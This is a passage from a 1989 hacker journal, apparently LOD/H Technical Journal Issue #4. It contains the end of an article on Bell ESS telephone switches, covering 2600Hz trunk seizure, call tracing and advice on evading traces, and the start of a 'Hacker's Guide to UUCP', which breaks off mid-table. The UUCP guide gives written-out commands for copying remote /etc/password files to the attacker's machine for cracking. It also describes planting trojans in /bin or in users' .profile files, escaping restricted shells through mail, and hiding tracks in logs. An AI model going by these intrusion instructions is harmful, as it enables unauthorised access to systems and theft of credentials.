      Western Electric 
      Analog switching under digital control 
      Even smaller version of No.1AESS 
      Rural applications for up to 4500 lines 
 
    - No.2EAX 
      GTE Automatic Electric 
      Smaller version of 1EAX 
      Analog switch under digital control 
 
    - No.4ESS 
      Western Electric 
      Toll switch, 4 wire tandem 
      Digital switching 
      Uses the 1AESS processor 
 
    - No.3EAX 
      Gee is there a pattern here? No GTE 
      Digital Toll switch 
      4 wire tandem switching 
 
    - No.5ESS 
      AT&T Network Systems 
      Full scale computerized digital switching 
      ISDN compatibility 
      Utilizes time sharing technology 
      Toll or end office 
 
    - DMS 100 Digital Matrix Switch 
      Northern Telecom 
      Similar to 5ESS 
      Runs slower 
      Considerably less expensive 
 
    - DMS 200 
      Toll and Access Tandem 
      Optional operator services 
 
    - DMS 250 
      Toll switch designed for common carriers 
 
    - DMS 300 
      Toll switch for international gateways 
 
    - No.5EAX 
      GTE Automatic Electric 
      Same as above 
 
    How much does a switch cost? A fully equipped 5ESS for a 40,000 
subscriber end office can cost well over 3 million dollars. Now you know why 
your phone bill is so much. Well...maybe you parents bill. 
 
 
    ** The 1ESS and 1AESS ** 
 
    This was the first switch of it's type put into widespread use by Bell. 
Primarily an analog switch under digital control, the switch is no longer 
being manufactured. The 1ESS has been replaced by the 5ESS and other full 
scale digital switches, however, it is still by far the most common switch 
used in today's Class 5 end offices. 
 
    The #1 and 1A use a crosspoint matrix similar to the X-bar.  The primary 
switch used in the matrix is the ferreed (remreed in the 1A).  It is a two 
state magnetic alloy switch.  It is basically a magnetic switch that does not 
require voltage to stay in it's present position. A voltage is only required 
to change the state of the switch. 
 
   The No. 1 utilized a computer style, common control and memory.  Memory 
used by the #1 changed with technology, but most have been upgraded to RAM. 
Line scanners monitor the status of customer lines, crosspoint switches, 
and all internal, outgoing, and incoming trunks, reporting their status to 
the central control.  The central control then either calls upon program or 
call store memories to chose which crosspoints to activate for processing the 
call.  The crosspoint matrices are controlled via central pulse distributors 
which in turn are controlled by the central control via data buses.  All of 
the scanner's AMA tape controllers, pulse distro, x-point matrix, etc., listen 
to data buses for their address and command or report their information on 
the buses. The buses are merely cables connecting the different units to the 
central control. 
 
   The 1E was quickly replaced by the 1A due to advances in technology. So 
1A's are more common, also many of the 1E's have been upgraded to a 1A. 
This meant changing the ferreed to the remreed relay, adding additional 
peripheral component controllers (to free up central controller load) and 
implementation of the 1A processor.  The 1A processor replaced older style 
electronics with integrated circuits.  Both switches operate similarly. 
The primary differences were speed and capacity.  The #1ESS could process 
110,000 calls per hour and serve 128,000 lines. 
 
    Most of the major common control elements are either fully or partially 
duplicated to ensure reliability. Systems run simultaneously and are checked 
against each other for errors. When a problem occurs the system will double 
check, reroute, or switch over to auxiliary to continue system operation. 
Alarms are also reported to the maintenance console and are in turn printed 
out on a printer near the control console. 
 
    Operation of the switch is done through the Master Control Center (MCC) 
panel and/or a terminal. Remote operation is also done through input/output 
channels. These channels have different functions and therefore receive 
different types of output messages and have different abilities as for what 
type of commands they are allowed to issue. Here is a list of the commonly 
used TTY channels. 
 
   Maintenance     - Primary channel for testing, enable, disable etc. 
   Recent Change   - Changes in class of service, calling features etc. 
   Administrative  - Traffic information and control 
   Supplementary   - Traffic information supplied to automatic network control 
   SCC Maint.      - Switching Control Center interface 
   Plant Serv.Cent.- Reports testing information to test facilities 
 
    At the end of this article you will find a list of the most frequently 
seen Maintenance channel output messages and a brief description of their 
meaning. You will also find a list of frequently used input messages. 
 
    There are other channels as well as back ups but the only ones to be 
concerned with are Recent Change and SCC maint. These are the two channels 
you will most likely want to get access to. The Maintenance channel doesn't 
leave the C.O. and is used by switch engineers as the primary way of 
controlling the switch. During off hours and weekends the control of the 
switch is transferred to the SCC. 
 
    The SCC is a centrally located bureau that has up to 16 switches 
reporting to it via their SCC maint. channel. The SCC has a mini computer 
running SCCS that watches the output of all these switches for trouble 
conditions that require immediate attention. The SCC personnel then have the 
ability to input messages to that particular switch to try and correct the 
problem. If necessary, someone will be dispatched to the C.O. to correct the 
problem. I should also mention that the SCC mini, SCCS has dialups and access 
to SCCS means access to all the switches connected to it. The level of access 
however, may be dependent upon the privileges of the account you are using. 
 
    The Recent Change channels also connect to a centrally located bureau 
referred to as the RCMAC. These bureaus are responsible for activating lines, 
changing class of service etc. RCMAC has been automated to a large degree by 
computer systems that log into COSMOS and look for pending orders. COSMOS is 
basically an order placement and record keeping system for central office 
equipment, but you should know that already, right? So this system, called 
Work Manager running MIZAR logs into COSMOS, pulls orders requiring recent 
change work, then in one batch several times a day, transmits the orders to 
the appropriate switch via it's Recent Change Channel. 
 
    Testing of the switch is done by many different methods. Bell Labs has 
developed a number of systems, many accomplishing the same functions. I will 
only attempt to cover the ones I know fairly well. 
 
    The primary testing system is the trunk test panels located at the switch 
itself. There are three and they all pretty much do the same thing, which is 
to test trunk and line paths through the switch. 
 
         Trunk and Line Test Panel 
         Supplementary Trunk Test Panel 
         Manual Trunk Test Panel 
 
     MLT (Mechanized Loop Testing) is another popular one. This system is 
often available through the LMOS data base and can give very specific 
measurements of line levels and losses. The "TV Mask" is also popular giving 
the user the ability to monitor lines via a call back number. 
 
    DAMT (Direct Access Mechanized Testing) is used by line repairmen to put 
tone on numbers to help them find lines. This was previously done by Frame 
personnel, so DAMT automated that task. DAMT can also monitor lines, but 
unfortunately, the audio is scrambled in a manor that allows one only to tell 
what type of signal is present on the line, or whether it is busy or not. 
 
    All of these testing systems have one thing in common: they access the 
line through a "No Test Trunk". This is a switch which can drop in on a 
specific path or line and connect it to the testing device. It depends on 
the device connected to the trunk, but there is usually a noticeable "click" 
heard on the tested line when the No Test Trunk drops in. Also the testing 
devices I have mentioned here will seize the line, busying it out. This will 
present problems when trying to monitor calls, as you would need to drop in 
during the call. The No Test Trunk is also the method in which operator 
consoles perform verifications and interrupts. 
 
 
    ** INTEROFFICE SIGNALLING ** 
 
    Calls coming into and leaving the switch are routed via trunks. The 
switches select which trunk will route the call most effectively and then 
retransmits the dialed number to the distant switch. There are several 
different ways this is done. The two most common are Loop Signaling and CCIS, 
Common Channel Interoffice Signaling. The predecessor to both of these is the 
famous and almost extinct "SF Signaling". This utilized the presence of 
2600hz to indicate trunks in use. If one winks 2600Hz down one of these 
trunks, the distant switch would think you hung up. Remove the 2600, and you 
have control of the trunk and you could then MF a number. This worked great 
for years. Assuming you had dialed a toll free number to begin with, there 
was no billing generated at all. The 1AESS does have a program called SIGI 
that looks for any 2600 winks after the original connection of a toll call. 
It then proceeds to record on AMA and output any MF digits received. For more 
information on AMA see Phantom Phreaker's article entitled, Understanding 
Automatic Message Accounting in the LOD/H TJ Issue #3. However due to many 
long distant carriers using signaling that can generate these messages it is 
often overlooked and "SIG IRR" output messages are quite common. 
 
    Loop signaling still uses MF to transmit the called number to distant 
switches, however, the polarity of the voltage on the trunk is reversed to 
indicate trunk use. 
 
    CCIS sometimes referred to CCS#6 uses a separate data link sending 
packets of data containing information regarding outgoing calls. The distant 
switch monitors the information and connects the correct trunk to the correct 
path. This is a faster and more efficient way of call processing and is being 
implemented everywhere. The protocol that AT&T uses is CCS7 and is currently 
being accepted as the industry standard. CCS6 and CCS7 are somewhat similar. 
 
    Interoffice trunks are multiplexed together onto one pair. The standard 
is 24 channels per pair. This is called T-1 in it's analog format and D-1 
in its digital format. This is often referred to as carrier or CXR. The terms 
frame error and phase jitter are part of this technology which is often a 
world in itself. This type of transmission is effective for only a few miles 
on twisted pair. It is often common to see interoffice repeaters in manholes 
or special huts. Repeaters can also be found within C.O.s, amplifying trunks 
between offices. This equipment is usually handled by the "carrier" room, 
often located on another floor. Carrier also handles special circuits, private 
lines, and foreign exchange circuits. 
 
     After a call reaches a Toll Switch, the transmit and receive paths of 
the calling and called party are separated and transmitted on separate 
channels. This allows better transmission results and allows more calls to 
be placed on any given trunk. This is referred to as 4 wire switching. This 
also explains why during a call, one person can hear crosstalk and the other 
cannot. Crosstalk will bleed over from other channels onto the multiplexed 
T-Carrier transmission lines used between switches. 
 
 
    ** CALL TRACING 
 
     So with the Loop Signaling standard format there is no information being 
transmitted regarding the calling number between switches. This therefore 
causes the call tracing routine to be at least a two step process. This is 
assuming that you are trying to trace an anticipated call, not one in 
progress. When call trace "CLID" is placed on a number, a message is output 
every time someone calls that number. The message shows up on most of the ESS 
output channels and gives information regarding the time and the number of the 
incoming trunk group. If the call came from within that office, then the 
calling number is printed in the message. Once the trunk group is known, it 
can usually be determined what C.O. the calls are coming from. This is also 
assuming that the calls are coming from within that Bell company and not 
through a long distance carrier (IEC). So if Bell knows what C.O. the calls 
are coming from, they simply put the called number on the C.I. list of that 
C.O. Anytime anyone in that C.O. calls the number in question another message 
is generated showing all the pertinent information. 
 
    Now if this were a real time trace it would only require the assistance 
of the SCC and a few commands sent to the appropriate switches (i.e. 
NET-LINE). This would give them the path and trunk group numbers of the call 
in progress. Naturally the more things the call is going through, the more 
people that will need to be involved in the trace. There seems to be a common 
misconception about the ability to trace a call through some of the larger 
packet networks i.e. Telenet and TYMNET. Well I can assure you, they can 
track a call through their network in seconds (assuming multiple systems 
and/or network gateways are not used) and then all that is needed is the 
cooperation of the Bell companies. Call tracing in itself it not that 
difficult these days. What is difficult is getting the different organizations 
together to cooperate. You have to be doing something relatively serious to 
warrant tracing in most cases, however, not always. So if tracing is a 
concern, I would recommend using as many different companies at one time as 
you think is necessary, especially US Sprint, since they can't even bill 
people on time much less trace a call. But...it is not recommended to call 
Sprint direct, more on that in the Equal Access section. 
 
 
    ** EQUAL ACCESS 
 
    The first thing you need to understand is that every IEC Inter Exchange 
Carrier (long distance company) needs to have an agreement with every LEC 
Local Exchange Carrier (your local phone company) that they want to have 
access to and from. They have to pay the LEC for the type of service they 
receive and the amount of trunks, and trunk use. The cost is high and the 
market is a zoo. The LECs have the following options: 
 
     - Feature Group A - 
 
    This was the first access form offered to the IECs by the LECs. Basically 
whenever you access an IEC by dialing a regular 7 digit number (POTS line) 
this is FGA. The IECs' equipment would answer the line and interpret your 
digits and route your call over their own network. Then they would pick up an 
outgoing telephone line in the city you were calling and dial your number 
locally. Basically a dial in, dial out situation similar to Telenet's 
PC pursuit service. 
 
     - Feature Group B - 
 
     FGB is 950-xxxx. This is a very different setup from FGA. When you dial 
950, your local switch routes the call to the closest Access Tandem (AT) (Toll 
Switch) in your area. There the IECs have direct trunks connected between the 
AT and their equipment. These trunks usually use a form of multiplexing like 
T-1 carrier with wink start (2600Hz). On the incoming side, calls coming in 
from the IEC are basically connected the same way. The IEC MFs into the AT 
and the AT then connects the calls. There are many different ways FGB is 
technically setup, but this is the most common. 
 
     Tracing on 950 calls has been an area of controversy and I would like to 
clear it up. The answer is yes, it is possible. But like I mentioned earlier, 
it would take considerable manpower which equals expensive to do this. It 
also really depends on how the IEC interface is set up. Many IECs have 
trunks going directly to Class 5 end offices. So, if you are using a small 
IEC, and they figure out what C.O. you are calling from, it wouldn't be out 
of the question to put CLID on the 950 number. This is highly unlikely and I 
have not heard from reliable sources of it ever being done. Remember, CLID 
generates a message every time a call is placed to that number. Excessive 
call trace messages can crash a switch. However, I should mention that brute 
force hacking of 950s is easily detected and relatively easy to trace. If the 
IEC is really having a problem in a particular area they will pursue it. 
 
     - Feature Group C - 
 
     FGC is reserved for and used exclusively by AT&T. 
 
     - Feature Group D - 
     FGD is similar to FGB with the exception that ANI is MF'ed to the IEC. 
The end office switch must have Equal Access capability in order to transmit 
the ANI. Anything above a X-bar can have it. FGD can only be implemented on 
800 numbers and if an IEC wants it, they have to buy the whole prefix. For a 
list of FGD prefixes see 2600 Magazine. You should also be aware that MCI, 
Sprint, and AT&T are offering a service where they will transmit the ANI to 
the customer as well. You will find this being used as a security or 
marketing tool by an increasing amount of companies. A good example would be 
800-999-CHAT. 
 
 
** OUTPUT MESSAGES ** 
 
The following is a compiled list of common switch messages. The list was 
compiled from various reference materials that I have at my disposal. 
 
 
                     1AESS COMMON OUTPUT MESSAGES 
                -------------------------------------- 
 
MSG.  DESCRIPTION 
---------------------------------------------------------------- 
    ** ALARM ** 
 
AR01  Office alarm 
AR02  Alarm retired or transferred 
AR03  Fuse blown 
AR04  Unknown alarm scan point activated 
AR05  Commercial power failure 
AR06  Switchroom alarm via alarm grid 
AR07  Power plant alarm 
AR08  Alarm circuit battery loss 
AR09  AMA bus fuse blown 
AR10  Alarm configuration has been changed (retired,inhibited) 
AR11  Power converter trouble 
AR13  Carrier group alarm 
AR15  Hourly report on building and power alarms 
 
      ** AUTOMATIC TRUNK TEST ** 
AT01  Results of trunk test 
 
      ** CARRIER GROUP ** 
CG01  Carrier group in alarm 
CG03  Reason for above 
 
      ** COIN PHONE ** 
CN02  List of pay phones with coin disposal problems 
CN03  Possible Trouble 
CN04  Phone taken out of restored service because of possible coin fraud 
 
      ** COPY ** 
COPY  Data copied from one address to another 
 
      ** CALL TRACE ** 
CT01  Manually requested trace line to line, information follows 
CT02  Manually requested trace line to trunk, information follows 
CT03  Intraoffice call placed to a number with CLID 
CT04  Interoffice call placed to a number with CLID 
CT05  Call placed to number on the CI list 
CT06  Contents of the CI list 
CT07  ACD related trace 
CT08  ACD related trace 
CT09  ACD related trace 
 
      ** DIGITAL CARRIER TRUNK ** 
DCT COUNTS Count of T carrier errors 
 
      ** MEMORY DIAGNOSTICS ** 
DGN   Memory failure in cs/ps diagnostic program 
 
      ** DIGITAL CARRIER "FRAME" ERRORS ** 
FM01  DCT alarm activated or retired 
FM02  Possible failure of entire bank not just frame 
FM03  Error rate of specified digroup 
FM04  Digroup out of frame more than indicated 
FM05  Operation or release of the loop terminal relay 
FM06  Result of digroup circuit diagnostics 
FM07  Carrier group alarm status of specific group 
FM08  Carrier group alarm count for digroup 
FM09  Hourly report of carrier group alarms 
FM10  Public switched digital capacity failure 
FM11  PUC counts of carrier group errors 
 
      ** MAINTENANCE ** 
MA02  Status requested, print out of MACII scratch pad 
MA03  Hourly report of system circuits and units in trouble 
MA04  Reports condition of system 
MA05  Maintenance interrupt count for last hour 
MA06  Scanners,network and signal distributors in trouble 
MA07  Successful switch of duplicated unit (program store etc.) 
MA08  Excessive error rate of named unit 
MA09  Power should not be removed from named unit 
MA10  OK to remove paper 
MA11  Power manually removed from unit 
MA12  Power restored to unit 
MA13  Indicates central control active 
MA15  Hourly report of # of times interrupt recovery program acted 
MA17  Centrex data link power removed 
MA21  Reports action taken on MAC-REX command 
MA23  4 minute report, emergency action phase triggers are inhibited 
 
      ** MEMORY ** 
MN02  List of circuits in trouble in memory 
 
      ** NETWORK TROUBLE ** 
NT01  Network frame unable to switch off line after fault detection 
NT02  Network path trouble Trunk to Line 
NT03  Network path trouble Line to Line 
NT04  Network path trouble Trunk to Trunk 
NT06  Hourly report of network frames made busy 
NT10  Network path failed to restore 
 
      ** OPERATING SYSTEM STATUS ** 
OP:APS-0 
OP:APSTATUS 
OP:CHAN 
OP:CISRC     Source of critical alarm, automatic every 15 minutes 
OP:CSSTATUS  Call store status 
OP:DUSTATUS  Data unit status 
OP:ERAPDATA  Error analysis database output 
OP:INHINT    Hourly report of inhibited devices 
OP:LIBSTAT   List of active library programs 
OP:OOSUNITS  Units out of service 
OP:PSSTATUS  Program store status 
 
      ** PLANT MEASUREMENTS ** 
PM01  Daily report 
PM02  Monthly report 
PM03  Response to a request for a specific section of report 
PM04  Daily summary of IC/IEC irregularities 
 
      ** REPORT ** 
REPT:ADS FUNCTION  Reports that a ADS function is about to occur 
REPT:ADS FUNCTION DUPLEX FAILED No ADS assigned 
REPT:ADS FUNCTION SIMPLEX Only one tape drive is assigned 
REPT:ADS FUNCTION STATE CHANGE Change in state of ADS 
REPT:ADS PROCEDURAL ERROR You fucked up 
REPT:LINE TRBL Too many permanent off hooks, may indicate bad cable 
REPT:PROG CONT OFF-NORMAL System programs that are off or on 
REPT:RC CENSUS Hourly report on recent changes 
REPT:RC SOURCE Recent change system status (RCS=1 means RC Channel inhibited) 
 
      ** RECENT CHANGE ** 
RC18  RC message response 
 
      ** REMOVE ** 
RMV   Removed from service 
 
      ** RESTORE ** 
RST   Restored to service status 
 
      ** RINGING AND TONE PLANT ** 
RT04  Status of monitors 
 
      ** SOFTWARE AUDIT ** 
SA01  Call store memory audit results 
SA03  Call store memory audit results 
 
      ** SIGNAL IRREGULARITY ** 
SIG IRR  Blue box detection 
SIG IRR INHIBITED  Detector off 
SIG IRR TRAF  Half hour report of traffic data 
 
      ** TRAFFIC CONDITION ** 
TC15  Reports overall traffic condition 
TL02  Reason test position test was denied 
TL03  Same as above 
 
      ** TRUNK NETWORK ** 
TN01  Trunk diagnostic found trouble 
TN02  Dial tone delay alarm failure 
TN04  Trunk diag request from test panel 
TN05  Trunk test procedural report or denials 
TN06  Trunk state change 
TN07  Response to a trunk type and status request 
TN08  Failed incoming or outgoing call 
TN09  Network relay failures 
TN10  Response to TRK-LIST input, usually a request from test position 
TN11  Hourly, status of trunk undergoing tests 
TN16  Daily summary of precut trunk groups 
 
      ** TRAFFIC OVERLOAD CONDITION ** 
TOC01 Serious traffic condition 
TOC02 Reports status of less serious overload conditions 
 
      ** TRANSLATION **  (shows class of service, calling features etc.) 
TR01  Translation information, response to VFY-DN 
TR03  Translation information, response to VFY-LEN 
TR75  Translation information, response to VF:DNSVY 
      **             ** 
TW02  Dump of octal contents of memory 
 
 
 
                    1AESS COMMON INPUT MESSAGES 
               ------------------------------------- 
 
 Messages always terminate with ". ctrl d "      x=number or trunk network # 
 
 
MSG.                   DESCRIPTION 
------------------------------------------------------------------------ 
NET-LINE-xxxxxxx0000   Trace of path through switch 
NET-TNN-xxxxxx         Same as above for trunk trace 
T-DN-MBxxxxxxx         Makes a # busy 
TR-DEACTT-26xxxxxxx    Deactivates call forwarding 
VFY-DNxxxxxxx          Displays class of service, calling features etc. 
VFY-LENxxxxxxxx        Same as above for OE 
VFY-LIST-09 xxxxxxx    Displays speed calling 8 list 
 
 
************************************************************************ 
 
    There are many things I didn't cover in this article and many of the 
things I covered, I did so very briefly. My intention was to write an article 
that explains the big picture, how everything fits together. I hope I helped. 
 
    Special thanks to all the stupid people, for without them some of us 
wouldn't be so smart and might have to work for a living. Also all the usual 
Bell Labs, AT&T bla bla bla etc. etc. 
 
    I can usually be reached on any respectable board, ha! 
 
 
             Agent Steal  Inner (C)ircle  1989 
 
                                  !!!!! 
 
                      !!!!! FREE KEVIN MITNICK !!!!! 
 
                                  !!!!! 
 
                            [End Of Article] 
 
The LOD/H Technical Journal, Issue #4: File 05 of 10 
 
 
             ===================================================== 
             ||                                                 || 
             ||            A Hacker's Guide to UUCP             || 
             ||                                                 || 
             ||                        by                       || 
             ||                                                 || 
             ||                    The Mentor                   || 
             ||                                                 || 
             ||              Legion of Doom/Hackers             || 
             ||                                                 || 
             ||                     08/04/89                    || 
             ||                                                 || 
             DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD 
 
Scope 
DDDDD 
 
   Part I of this file is intended for the casual hacker- someone 
familiar with UNIX commands, but who hasn't had extended experience 
with the UUCP network.  Part II will be intended for the advanced 
hacker who has the confidence and knowledge to go out and modify 
a UNIX network- the logs, the paths, the permissions, etc... 
 
 
Introduction 
DDDDDDDDDDDD 
 
   Like it or not, UNIX is the most popular operating system in the 
world.  As a hacker, you are likely to run into several hundred 
UNIX machines over the course of your hacking career.  Knowing how 
to move around and use the UNIX environment should be considered 
absolutely essential, especially since UNIX is the operating system 
of choice among phone company computers. 
 
   This article is not an attempt to teach you how to use UNIX. 
If you don't know what a '$ls -x > dir' does, you need to put this 
article in your archives, get a good basic file on UNIX (or buy a 
book on it- there are several good ones out ((see the Bibliography 
at the end of this file for suggestions))), read it, and then play 
around some in a UNIX machine.  Please!  If you have managed to 
stumble into a Bell system, do *not* use it as a machine to learn 
UNIX on!  You *will* get noticed by security, and this will lead 
not only to the security being tightened, but may well lead to Bell 
Security going through your underwear drawer. 
 
   The information in this article is mainly concerning AT&T System 
V UNIX.  I have included BSD 4.3 & Xenix information also in cases 
that I was able to determine alternate procedures.  All information 
has been thoroughly tested and researched on as many machines as 
possible.  Standard disclaimer, your system may be slightly 
different. 
 
Glossary & Usage 
DDDDDDDDDDDDDDDD 
 
BNU     - Basic Networking Utilities.  System V.3's uucp package. 
daemon  - A program running in the background. 
LAN     - Local Area Network. 
network - A group of machines set up to exchange information and/or 
          resources. 
node    - A terminating machine on a network. 
UUCP    - When capitalized, refers to the UNIX networking utilities 
          package. 
uucp    - In lower case, refers to the program Unix-to-Unix-CoPy. 
 
I. General Information 
   DDDDDDDDDDDDDDDDDDD 
 
   A. What is UUCP? 
 
   UUCP is a networking facility for the UNIX operating system. 
It is made up of a number of different programs that allow UNIX 
machines to talk to each other.  Using UUCP, you can access a 
remote machine to copy files, execute commands, use resources, or 
send mail.  You can dial out to other non-UNIX computers, and you 
can access public mail/news networks such as USENET. 
 
   B. History of UUCP 
 
   The first UUCP system was built in 1976 by Mike Lest at AT&T 
Bell Labs.  This system became so popular that a second version was 
developed by Lesk, David Nowitz, and Greg Chesson.  Version 2 UUCP 
was distributed with UNIX Version 7. 
 
   With System V Release 3, a new version of UUCP that was 
developed in 1983 by Peter Honeyman, David A. Nowitz, and Brian E. 
Redman.  This version is known as either HoneyDanBer UUCP (from the 
last names of the developers), or more conventionally as Basic 
Networking Utilities (BNU).  I will stick with BNU, as it is easier 
to type.  BNU is backward compatible with Version 2, so there is 
no problem communicating between the two. 
 
   BSD 4.3's UUCP release incorporates some of the BNU features, 
but retains more similarity to Version 2 UUCP. 
 
   If you are unsure about which version of UUCP is on the system 
that you are in, do a directory of /usr/lib/uucp and look at the 
files.  If you have a file called L.sys, you are in a Version 2 
system.  If there is a file called Systems, then it's BNU.  See 
Table 1 for a fairly complete listing of what system runs what UUCP 
version. 
 
 
                                Table 1* 
                                DDDDDDD 
Manufacturer              Model            UNIX/UUCP Version 
 
_____________________________________________________________ 
|                |                        |                  | 
| Apollo         |   3000 Series (Domain) | BSD 4.2/Version 2| 
| Altos          |   All models           | Xenix/Version 2  | 
| AT&T           |   3B1 (UNIX PC)        | System V.2/Vers.2| 
| AT&T           |   3B2                  | System V.3/BNU   | 
| AT&T           |   3B15                 | System V.3/BNU   | 
| Convergent     |   Miniframe (CTIX)     | System V.2/Vers.2| 
| Technologies   |   Mightframe (CTIX)    | System V.3/BNU   | 
| DEC            |   MicroVAX             | Ultrix/Vers. 2 + | 
| DEC            |   VAX                  | BSD 4.3/Vers. 2 +| 
| Encore         |   Multimax             | System V.3/BNU   | 
| IBM            |   PC-RT (AIX)          | System V.2/Vers.2| 
| Masscomp       |   MC-5000 Series       | System V.3/BNU   | 
| Microport      |   PC/AT                | System V.2/Vers.2| 
| NCR            |   Tower 32/16          | System V.2/Vers.2| 
| Prime          |   EXL Series           | System V.2/Vers.2| 
| Pyramid        |   90x                  | BSD 4.2/Version 2| 
| SCO/Xenix      |   PC/XT                | System V.2/Vers.2| 
| Unisys         |   5000 & 7000 Series   | System V.2/Vers.2| 
|                |                        |                  | 
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD 
*  This table is slightly outdated.  Some of the systems may have 
   upgraded since this article was written. 
 
 
II. UUCP Communications 
    DDDDDDDDDDDDDDDDDDD 
 
    A. Overview of UUCP User Programs 
 
    There are a number of programs that are used by a UUCP 
communication network.  Some are standard UNIX programs, others are 
exclusively part of the UUCP package. 
................................................................. 
 
        These three are standard UNIX commands: 
 
        mail-   UNIX's mail facility can be used to send messages 
                to other systems on a UUCP network. 
        cu-     Connects you to a remote machine and allows you to 
                be logged in simultaneously to both machines.  Also 
                allows you execute commands on either machine 
                without dropping the link. 
        tip-    (BSD) same as cu. 
 
                               +++ 
 
        There are five main programs within UUCP: 
 
        uucp-   Does all the setup for a remote file transfer. 
                uucp creates files that describe the file transfer 
                (called 'work' files), then calls the uucico daemon 
                to do the actual work. 
        uux-    Used to execute commands on a remote machine.  uux 
                performs similar to uucp, except that commands are 
                processed instead of files. 
        uuname- Used to list the names of other systems that are 
                connected to your network. 
        uulog-  Displays the uucp log for the specified machine. 
                I'll be showing how to cover your uucp tracks from 
                this later in the article. 
        uustat- Gets the status of uux requests.  Also lets you 
                manipulate the contents of a UUCP queue. 
 
                                   +++ 
 
        System V also has two additional programs: 
 
        uuto-   Allows you to send files to another user similar 
                to the UNIX mail command. 
        uupick- Allows you to read files sent to you with uuto. 
 
                                   +++ 
 
        BSD 4.3 has two additional programs: 
 
        uuq-    Lets you view & manipulate UUCP jobs that are 
                waiting to be processed, similar to System V's 
                uupick program. 
        uusend- Lets you forward files through a string of systems. 
 .................................................................. 
 
III. Using the Programs 
     DDDDDDDDDDDDDDDDDD 
 
     A. uuname 
 
     This one is easy & friendly.  All you do is type '$uuname'. 
It will spit out a list of all systems on your network.  If you 
aren't sure about the name of your local system, invoke uuname with 
the -l option. ($uuname -l). 
 
     B. mail 
 
     I'm not going to say to much about mail, as it isn't a program 
that you will use much as a hacker except possibly to break out of 
a shell.  Sending mail to other people is not a good way to stay 
hidden, as all mail transfer to remote systems is logged (no, they 
may not read the mail, but they're likely to notice that the 
unassigned ADMIN account is suddenly getting mail from all over the 
world...)  These logs can be modified, however.  This will 
be covered in Part II. 
 
     Briefly, mail is invoked with the command 'mail username' (or 
mailx under some systems).  If you wish to send mail to user john 
on the system you're on, you would type: 
 
mail john 
Dear John- 
     This is mail.  Enjoy it. 
^D   (usage note, this means control-D) 
 
     To send mail to a user on a remote system, or a string of 
systems, you would use the ! key to indicate a remote system name. 
If you were on node Alpha and wanted to send mail to john on node 
Beta, you would address your mail to 'mail Beta!john'.  If you 
wanted to send mail to a user on system that's not connected to 
yours, but *is* connected to a machine you are connected to, you 
would string together the system names, separated by a !. For 
example, if node Saturn was connected to Beta, but not to Alpha, 
you could send mail to susan on Saturn with 'mail Beta!Saturn!susan'. 
 
     Please note- If you are running the C-Shell or Bourne Shell, 
you will have to prefix the ! with a X.  i.e. 'mail BetaX!SaturnX!susan'. 
Also, the mail header displays the system name, return path, and account 
name that you send mail from, so don't try to anonymously mail someone 
a message- it won't work. 
 
     Another quick feature (this is under the 'basic unix 
knowledge' category), if you want to mail a file named 'message' 
to someone, you'd type the following - '$mail Beta!Saturn!susan < 
message'. 
 
     Finally, as mentioned above, it may be possible to break out 
of a restricted shell within mail.  Simply send mail to yourself, 
then when you enter mail to read the message, type !sh to exit from 
mail into shell. This will often blow off the restricted shell. 
 
 
     C. File Transfer 
 
     One of the first things that you will want to do when you 
discover that you're on a network (uuname, remember?) is to grab 
a copy of the /etc/password file from the systems on the net then 
run Shooting Shark's password hacking program from TJ Issue #2. 
Even if you have no use for it now, save it & label it, you never 
know when you might need to get into that system. Besides, when 
printed, they make fun & interesting wallpaper. 
 
     Unfortunately, the /etc/ directory will sometimes have access 
restricted.  You can get around this by copying the /etc/password 
file to the /usr/spool/uucppublic directory using the uux command 
(see below).  If the uux program has restrictions on in, then you 
may have to actually hack into the remote system using the rlogin 
command.  Be persistent. 
 
     UUCP is also useful in that it allows you to send a file from 
your system to a remote system.  Got a nice little trojan you need 
to insert on their system?  Use UUCP to drop it into the /bin/ 
directory.  Or if they protected the /bin/ directory (likely, if 
they have half a brain), they might have forgotten to protect all 
of the users private directories (i.e. /usr/mike or /usr/susan or 
sometimes even /usr/admin).  UUCP a copy of a .profile file to your 
system, insert your own stuff in it, then UUCP it back to its 
original directory where the user will access it the next time he 
logs in.  People rarely $cat their .profile file, so you can 
usually get away with murder in them. 
 
     While uucp has some limitations, it has the advantage of being 
present on every UUCP system in the world.  If you're on a System 
V, you will probably use uuto & uupick much more frequently, as 
it's easier to do subtle hacks with them.  But if uucp is all you 
have, remember, you're a hacker.  Show some ingenuity.  The syntax 
of uucp when sending a file is: 
 
$uucp [options] <local source> <remote destination> 
 
     For example, you have a program sitting in your working 
directory on node Alpha called 'stuff', and you want to plop it 
into the /usr/spool/uucppublic/mike/ directory of node Beta.  The 
command would be '$uucp stuff Beta!/usr/spool/uucppublic/mike/'. 
(Don't forget to add a slash in front of the exclamation point if 
you're in C-Shell or Bourne!)  A good thing to know that will save 
you some typing is that the /usr/spool/uucppublic/ directory can 
be abbreviated as D/ (in KSH only), so that the above command could look 
like '$uucp stuff Beta!D/mike/'.  You can also specify a path other than 
D/.  If you wish to drop your 'new & improved' version of the 
/etc/password file into the /etc/ directory, you could do a '$uucp 
password Beta!/etc/'.  Just don't be surprised if it gets bounced 
with a message similar to the following: 
 
                From uucp Sat Dec 24 23:13:15 1988 
                Received: by Beta.UUCP (2.15/3.3) 
                id AA25032; Sat Dec 24 23:13:15 edt 
                Date: Sat Dec 24 23:13:15 edt 
                From: uucp 
                Apparently to: hacker 
                Status: R 
 
                file /etc/password, system Beta 
                remote access to path/file denied 
 
     Another hacker-friendly feature of UUCP is the ability to copy 
something into a remote user's login directory by entering a D 
character before the username.  For example, to dump a modified 
.profile file into a user on Beta named alex, you would do the 
following: 
 
 
        '$uucp .profile Beta!Dalex' 
 
The syntax for uucp when receiving a remote file is: 
 
$uucp [options] <remote path> <local directory> 
 
For example, you wish to grab Beta's password file and put it in 
a subdirectory called tmp in the account 'hacker' on node Alpha. 
The command would be: 
 
'$uucp Beta!/etc/password Alpha!/usr/hacker/tmp/'. 
 
The same things concerning use of tildes (D) demonstrated in 
sending files applies when receiving them. The following table 
contains valid options to the uucp command. 
 
 
                                    Table 2 
                                    DDDDDDD 
               _________________________________________________ 
               |                                               | 
               |  -C Copy the local source file to the spool   | 
               |     directory before attempting the trans-    | 
               |     fer.                                      | 
               |                                               | 
               |  -f If the directory doesn't exist, abort the | 
               |     transfer.  Normally uucp will create any  | 
               |     non-existent directories, which is bad    | 
               |     technique if you're a good hacker...      | 
               |                                               | 
